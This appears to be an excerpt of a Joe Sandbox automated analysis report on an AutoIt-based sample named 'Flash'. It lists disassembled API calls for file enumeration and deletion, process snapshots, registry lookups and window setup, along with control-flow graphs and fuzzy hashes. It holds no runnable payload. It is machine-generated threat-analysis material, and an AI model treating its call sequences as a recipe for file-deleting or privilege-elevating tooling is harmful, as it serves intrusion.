                                                        • AutoIt, xrefs: 00A20B23
                                                        • runas, xrefs: 00A20BE4
                                                        • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00A20B28
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                        • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                        • API String ID: 529118366-2030392706
                                                        • Opcode ID: e5f017616edfc7c5f4914ae8f32645aa60d11e246c312d625039747f01b95d7b
                                                        • Instruction ID: a5e207a8bdc5f499f8a0e7495e358a837dfb1c2dde4302dc9e3db946cadf7ea0
                                                        • Opcode Fuzzy Hash: e5f017616edfc7c5f4914ae8f32645aa60d11e246c312d625039747f01b95d7b
                                                        • Instruction Fuzzy Hash: AB51F531A18288EECF12EBF5EC45FEE7B78AF45344F104066F561A6162DEB45D46CB20

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 009F0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009E2A58,?,00008000), ref: 009F02A4
                                                          • Part of subcall function 00A34FEC: GetFileAttributesW.KERNEL32(?,00A33BFE), ref: 00A34FED
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A33D96
                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00A33E3E
                                                        • MoveFileW.KERNEL32(?,?), ref: 00A33E51
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00A33E6E
                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A33E90
                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00A33EAC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 4002782344-1173974218
                                                        • Opcode ID: a66be1e0367eb65b3ebba0003e448fe46639cf6b636da857f5fc08a0cf40d1d6
                                                        • Instruction ID: c5494186fea4d9bf17ea2e1ac4026e1430767fa761b72f51881c38847e8e3938
                                                        • Opcode Fuzzy Hash: a66be1e0367eb65b3ebba0003e448fe46639cf6b636da857f5fc08a0cf40d1d6
                                                        • Instruction Fuzzy Hash: 6751813280514DAACF16EBE1CA92EEDB7B9AF54301F204165F452B7192EF316F49CB60

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1105 9e5d13-9e5d73 call 9e1207 GetVersionExW call 9e1821 1110 9e5e78-9e5e7a 1105->1110 1111 9e5d79 1105->1111 1113 a20fa9-a20fb5 1110->1113 1112 9e5d7c-9e5d81 1111->1112 1114 9e5e7f-9e5e80 1112->1114 1115 9e5d87 1112->1115 1116 a20fb6-a20fba 1113->1116 1119 9e5d88-9e5dbf call 9e1981 call 9e133d 1114->1119 1115->1119 1117 a20fbc 1116->1117 1118 a20fbd-a20fc9 1116->1118 1117->1118 1118->1116 1120 a20fcb-a20fd0 1118->1120 1128 a21098-a2109b 1119->1128 1129 9e5dc5-9e5dc6 1119->1129 1120->1112 1122 a20fd6-a20fdd 1120->1122 1122->1113 1124 a20fdf 1122->1124 1127 a20fe4-a20fea 1124->1127 1130 9e5e00-9e5e17 GetCurrentProcess IsWow64Process 1127->1130 1131 a210b4-a210b8 1128->1131 1132 a2109d 1128->1132 1133 9e5dcc-9e5dcf 1129->1133 1134 a20fef-a20ffa 1129->1134 1139 9e5e1c-9e5e2d 1130->1139 1140 9e5e19 1130->1140 1141 a210a3-a210ac 1131->1141 1142 a210ba-a210c3 1131->1142 1137 a210a0 1132->1137 1133->1130 1138 9e5dd1-9e5def 1133->1138 1135 a21017-a21019 1134->1135 1136 a20ffc-a21002 1134->1136 1146 a2101b-a21027 1135->1146 1147 a2103c-a2103f 1135->1147 1143 a21004-a21007 1136->1143 1144 a2100c-a21012 1136->1144 1137->1141 1138->1130 1145 9e5df1-9e5df7 1138->1145 1149 9e5e2f-9e5e3f call 9e55f0 1139->1149 1150 9e5e98-9e5ea2 GetSystemInfo 1139->1150 1140->1139 1141->1131 1142->1137 1148 a210c5-a210c8 1142->1148 1143->1130 1144->1130 1145->1127 1154 9e5dfd 1145->1154 1155 a21031-a21037 1146->1155 1156 a21029-a2102c 1146->1156 1151 a21041-a21050 1147->1151 1152 a21065-a21068 1147->1152 1148->1141 1162 9e5e8c-9e5e96 GetSystemInfo 1149->1162 1163 9e5e41-9e5e4e call 9e55f0 1149->1163 1157 9e5e65-9e5e75 1150->1157 1158 a21052-a21055 1151->1158 1159 a2105a-a21060 1151->1159 1152->1130 1161 a2106e-a21083 1152->1161 1154->1130 1155->1130 1156->1130 1158->1130 1159->1130 1164 a21085-a21088 1161->1164 1165 a2108d-a21093 1161->1165 1167 9e5e56-9e5e5a 1162->1167 1170 9e5e85-9e5e8a 1163->1170 1171 9e5e50-9e5e54 GetNativeSystemInfo 1163->1171 1164->1130 1165->1130 1167->1157 1169 9e5e5c-9e5e5f FreeLibrary 1167->1169 1169->1157 1170->1171 1171->1167
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 009E5D40
                                                          • Part of subcall function 009E1821: _memmove.LIBCMT ref: 009E185B
                                                        • GetCurrentProcess.KERNEL32(?,00A60A18,00000000,00000000,?), ref: 009E5E07
                                                        • IsWow64Process.KERNEL32(00000000), ref: 009E5E0E
                                                        • GetNativeSystemInfo.KERNEL32(00000000), ref: 009E5E54
                                                        • FreeLibrary.KERNEL32(00000000), ref: 009E5E5F
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 009E5E90
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 009E5E9C
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                        • String ID:
                                                        • API String ID: 1986165174-0
                                                        • Opcode ID: 1c20fff8763710d1b66467ab650c063a66c39a3017ece8380eb916b650ddee77
                                                        • Instruction ID: 72f9ee3e327f35bb446d02b0d614ea65c174525c48095ffe53d1d01e73621779
                                                        • Opcode Fuzzy Hash: 1c20fff8763710d1b66467ab650c063a66c39a3017ece8380eb916b650ddee77
                                                        • Instruction Fuzzy Hash: 2B91B531549BC0EEC732CB7995505ABBFE56F3A304B884A6ED0C793A41D234AA48C759

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1172 a34005-a3404c call 9e1207 * 3 call 9f0284 call a34fec 1183 a3404e-a34057 call 9e1900 1172->1183 1184 a3405c-a3408d call 9f0119 FindFirstFileW 1172->1184 1183->1184 1188 a3408f-a34091 1184->1188 1189 a340fc-a34103 FindClose 1184->1189 1188->1189 1190 a34093-a34098 1188->1190 1191 a34107-a34129 call 9e1cb6 * 3 1189->1191 1192 a340d7-a340e9 FindNextFileW 1190->1192 1193 a3409a-a340d5 call 9e1c9c call 9e17e0 call 9e1900 DeleteFileW 1190->1193 1192->1188 1196 a340eb-a340f1 1192->1196 1193->1192 1207 a340f3-a340fa FindClose 1193->1207 1196->1188 1207->1191
                                                        APIs
                                                          • Part of subcall function 009F0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009E2A58,?,00008000), ref: 009F02A4
                                                          • Part of subcall function 00A34FEC: GetFileAttributesW.KERNEL32(?,00A33BFE), ref: 00A34FED
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A3407C
                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A340CC
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A340DD
                                                        • FindClose.KERNEL32(00000000), ref: 00A340F4
                                                        • FindClose.KERNEL32(00000000), ref: 00A340FD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 2649000838-1173974218
                                                        • Opcode ID: 9b2a7f9bf171eaf54a9c7cfe60fdde64cc16913e748aeb082ff6fca4f4ac548a
                                                        • Instruction ID: df97a296a91988b92cfd7545cbf53763a9d41e837580e9b7011feacd9b48333f
                                                        • Opcode Fuzzy Hash: 9b2a7f9bf171eaf54a9c7cfe60fdde64cc16913e748aeb082ff6fca4f4ac548a
                                                        • Instruction Fuzzy Hash: 3C316F310083859BC705EFA4D895DAFB7E8BE96304F444E1DF5E582192EB35AE09C762
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00A3416D
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00A3417B
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00A3419B
                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 00A34245
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 3243318325-0
                                                        • Opcode ID: c4eecd7b820c7a44a2563f6bb50d1c1b63653ae9b06fd85355d28b31cf65e948
                                                        • Instruction ID: 45551544f7b7b111b560806bc8ad7ba496a3bb65bcecba6a1457302e3b6104de
                                                        • Opcode Fuzzy Hash: c4eecd7b820c7a44a2563f6bb50d1c1b63653ae9b06fd85355d28b31cf65e948
                                                        • Instruction Fuzzy Hash: 743171711083419BD301EF91D885BAFBBF8AFD9350F10092DF595D21A1EBB1A989CB52
                                                        APIs
                                                          • Part of subcall function 009E3740: CharUpperBuffW.USER32(?,00A971DC,00000000,?,00000000,00A971DC,?,009D53A5,?,?,?,?), ref: 009E375D
                                                        • _memmove.LIBCMT ref: 009DB68A
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper_memmove
                                                        • String ID:
                                                        • API String ID: 2819905725-0
                                                        • Opcode ID: f94b40be4510c1c8f374de1ab5350074f3d3b1b6cc2c10704d2928b6dee0ba77
                                                        • Instruction ID: 9126c5b6eb7e2e2caf079ecf16cfe44a1d7f53cc7c5334178a5edd77c98465b3
                                                        • Opcode Fuzzy Hash: f94b40be4510c1c8f374de1ab5350074f3d3b1b6cc2c10704d2928b6dee0ba77
                                                        • Instruction Fuzzy Hash: 84A28975648341DFCB20CF18C480B6AB7E5BF88304F15896EE89A8B361D775ED85CB92
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,00A1FC86), ref: 00A3495A
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A3496B
                                                        • FindClose.KERNEL32(00000000), ref: 00A3497B
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirst
                                                        • String ID:
                                                        • API String ID: 48322524-0
                                                        • Opcode ID: 3023e5b68f7a99bb965ecd20d4746488ee7213d5de73b895a644bc06266b16df
                                                        • Instruction ID: 0e760e8d64b0ca46d75f5538098adcfa7fec5867dabf8959e9bd2deae6df4691
                                                        • Opcode Fuzzy Hash: 3023e5b68f7a99bb965ecd20d4746488ee7213d5de73b895a644bc06266b16df
                                                        • Instruction Fuzzy Hash: 8DE0DF31810505AB8210AB78EC0D8EB7BAC9E0B339F100B05F935C20E0EBB0A9848696
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0583fbf90d3dcc955b15b7fd3210ea970fa9ae60c7fdd096814fad041128d5b0
                                                        • Instruction ID: 55c16fdd4e59b14b86dc431ec82ebb54c57b912870688d564f0f3aa1d94793e9
                                                        • Opcode Fuzzy Hash: 0583fbf90d3dcc955b15b7fd3210ea970fa9ae60c7fdd096814fad041128d5b0
                                                        • Instruction Fuzzy Hash: 3122BA74A4020ADFDB24EF54C480BBEB7B4FF49300F18C56AE956AB341E735A981CB91
                                                        APIs
                                                        • timeGetTime.WINMM ref: 009DBF57
                                                          • Part of subcall function 009D52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009D52E6
                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00A136B5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessagePeekSleepTimetime
                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                        • API String ID: 1792118007-922114024
                                                        • Opcode ID: 23c51e710529edbb5ec6b8cdf56f99a1e56c654e86da2d9898e0bde517dceb4b
                                                        • Instruction ID: 7ee845a54f8bc050327dbc45e66a89df7f5b4f7294ed58856f7cd06426833c0a
                                                        • Opcode Fuzzy Hash: 23c51e710529edbb5ec6b8cdf56f99a1e56c654e86da2d9898e0bde517dceb4b
                                                        • Instruction Fuzzy Hash: BFC2CF71608341DFCB24DF24C884BAAB7E5BF84304F14891EF59A973A1CB75E985CB92

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 009D3444
                                                        • RegisterClassExW.USER32(00000030), ref: 009D346E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009D347F
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 009D349C
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009D34AC
                                                        • LoadIconW.USER32(000000A9), ref: 009D34C2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009D34D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: 37424b2105411478a6fd4eae0e3636995ab0581870b20d3ababc5c32b9c06a08
                                                        • Instruction ID: f89c8eb20fe4ed98a96ab898d06fa2a0cfa3e2074b114422718e76423669afdb
                                                        • Opcode Fuzzy Hash: 37424b2105411478a6fd4eae0e3636995ab0581870b20d3ababc5c32b9c06a08
                                                        • Instruction Fuzzy Hash: 443123B1954309AFDB51CFE4EC88BDEBBF0FB09310F10855AE590A62A0D7B51582CFA0

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 009D3444
                                                        • RegisterClassExW.USER32(00000030), ref: 009D346E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009D347F
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 009D349C
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009D34AC
                                                        • LoadIconW.USER32(000000A9), ref: 009D34C2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009D34D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: a816ff9fc2a367e0147590562481fa12fe70d48ad34345260acf6d73e0c08372
                                                        • Instruction ID: 56e82cebde6237d456f8b181b40a14d3e21672bd4c4a824cfb0e5686001abe93
                                                        • Opcode Fuzzy Hash: a816ff9fc2a367e0147590562481fa12fe70d48ad34345260acf6d73e0c08372
                                                        • Instruction Fuzzy Hash: 9C21E7B1A14208AFDB00DFD4EC48BDE7BF4FB08700F00815AF510A62A0DBB15582CFA5

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 009F00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,009E3094), ref: 009F00ED
                                                          • Part of subcall function 009F08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,009E309F), ref: 009F08E3
                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009E30E2
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A201BA
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A201FB
                                                        • RegCloseKey.ADVAPI32(?), ref: 00A20239
                                                        • _wcscat.LIBCMT ref: 00A20292
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                        • API String ID: 2673923337-2727554177
                                                        • Opcode ID: b670803a7e2f13fd944117d847e5c82a01c3e9930d4f17a1df0cbd7a25f17b68
                                                        • Instruction ID: 07c44b38008c09bbd2c3bcc263ab33cd7ed742c9a5972b91b88f25f650946c45
                                                        • Opcode Fuzzy Hash: b670803a7e2f13fd944117d847e5c82a01c3e9930d4f17a1df0cbd7a25f17b68
                                                        • Instruction Fuzzy Hash: B4719D716053019EC705EFA5EC81AABBBF8FF86340B40492EF565C31A1EF309945CB52

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 009E5156
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 009E5165
                                                        • LoadIconW.USER32(00000063), ref: 009E517C
                                                        • LoadIconW.USER32(000000A4), ref: 009E518E
                                                        • LoadIconW.USER32(000000A2), ref: 009E51A0
                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 009E51C6
                                                        • RegisterClassExW.USER32(?), ref: 009E521C
                                                          • Part of subcall function 009D3411: GetSysColorBrush.USER32(0000000F), ref: 009D3444
                                                          • Part of subcall function 009D3411: RegisterClassExW.USER32(00000030), ref: 009D346E
                                                          • Part of subcall function 009D3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009D347F
                                                          • Part of subcall function 009D3411: InitCommonControlsEx.COMCTL32(?), ref: 009D349C
                                                          • Part of subcall function 009D3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009D34AC
                                                          • Part of subcall function 009D3411: LoadIconW.USER32(000000A9), ref: 009D34C2
                                                          • Part of subcall function 009D3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009D34D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
                                                        • Opcode ID: 10b1ed3d0bde2ad9e6dfabbd91b5bcec4d82017f9cd9484cba5fcea37504378a
                                                        • Instruction ID: 900ff33d13de0ca66f41e2d6ff6e1363d1023d20759c9f4f726ee6e0c32f379e
                                                        • Opcode Fuzzy Hash: 10b1ed3d0bde2ad9e6dfabbd91b5bcec4d82017f9cd9484cba5fcea37504378a
                                                        • Instruction Fuzzy Hash: CE214DB1A24308AFEB11DFE4ED09B9E7BB4FB08311F04415AF504A62A0DBB56951DFA4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
